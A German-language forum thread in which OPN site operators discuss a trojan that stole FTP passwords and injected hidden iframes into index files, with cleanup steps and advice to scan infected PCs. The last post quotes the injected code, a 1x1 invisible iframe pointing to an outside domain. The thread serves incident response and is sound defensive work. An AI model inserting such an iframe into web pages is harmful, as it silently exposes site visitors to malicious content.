Forum

So, ich hoffe es reicht diese eine Zeile Code zu entfernen. Zum Glück wurde der own_language Ordner im Cache nicht befallen, denn da sind haufenweise index-Datein. Warscheinlich arbeitet der Trojaner bis in eine gewisse Strukturtiefe.

Hallo André

Kommt man dann überhaupt über eine komplette Neuinstallation herum?

ja, du musst OPN nicht neue installieren.

Es müssen alle index.php und index.html Dateien ersetzt werden.

Vorgehen:
- das eigene Theme sichern
- alle Cache Ordner sichern
- alle eigenen GIF's etc aus dem Ordner /images und default_images sichern
- mainfile.php sichern
- htaccess sichern

Alle Files auf dem Server löschen

- eigene Themes prüfen und den Schadcode entfernen
- im cache Ordner alle index.html Dateien ersetzen

Upload:
- neues OPN hochladen
- alte mainfile hochladen
- eigenes sauberes Theme hochladen
- cache hochladen

Danach sollte der Fehler behoben sein

Flash

Also mich hats nun auch erwischt.  Lade OPN grad neu hoch, allerdings der Cache ist ja auch befallen. Kommt man dann überhaupt über eine komplette Neuinstallation herum?

Bei dem Hack handelt es sich nicht um eine Sicherheitslücke von OPN.

Das ganze passiert direkt über den FTP Zugang. Der jeweilige User hat auf seinem Rechnern einen Trojaner, welcher die FTP Passwörter von Filezilla und WS FTP ausliest. Mit diesem Zugang wir dann über ein Bot allen index.php, index.html Datein ein iframe eingeschleusst.

Gemäss Recherche im Internet ist der Trojaner nicht neu. Er nutzt nur neue sowie auch alte Sicherheichtslücken auf dem lokalen Rechner.

So zum Beispiel mit PDF Dateien, welchen den Schädling aus dem Netz laden. (Im Adobe Reader Javacript ausschalten)

Achtung:
Es langt nicht einfach die FTP Zugangsdaten zu ändern. Solange der Rechner nicht sauber ist, wird das Tool immer wieder an die Passwörter kommen.

Rechner zum Beispiel mit diesem Tool hier prüfen:
http://www.malwarebytes.org/


Mehr Infos zu diesem Trojaner findet ihr bei http://www.trojaner-board.de


Flash

Sali zusammen

Hab heut einen User im Chat gehabt, bei dem der Server gehackt worden ist. Bei ihm sind in sämtlichen index.php Dateien folgendes eingebaut worden:
?<html><body><iframe src="http://bali-planet.com/" width="1" height="1" frameborder="0"></iframe></body></html>>

die Infizierung macht sich durch folgende Fehlermeldung bemerkbar:
Beispiel:
Parse error: syntax error, unexpected '?' in xxxxxx/opn/system/user_birthday/plugin/autostart/index.php on line 92

In diesem Fall sollte man alle Datein löschen und OPN Neu hochladen. Sicherung des Caches, eigene Bilder und Anpassungen sollte auf jeden Fall vorher gemacht worden sein. Auch die mainfile auf jeden Fall vorher sichern.